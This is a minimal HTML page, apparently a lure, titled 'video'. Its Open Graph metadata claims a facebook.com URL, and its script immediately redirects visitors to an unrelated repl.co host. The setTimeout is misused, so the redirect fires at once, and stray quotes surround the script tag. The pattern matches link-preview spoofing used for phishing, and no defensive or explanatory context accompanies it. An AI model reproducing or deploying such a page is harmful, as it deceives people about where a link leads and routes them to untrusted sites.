<!DOCTYPE html>
<html lang="en">
  <head>
    <title>video</title>
  </head>
  <body>
    <meta property="og:url" content="https://www.facebook.com/" />
    '<script language="javascript">
      setTimeout(
        (location.href = "https://video1--cn14135.repl.co"),
        8000
      );</script
    >';
  </body>
</html>
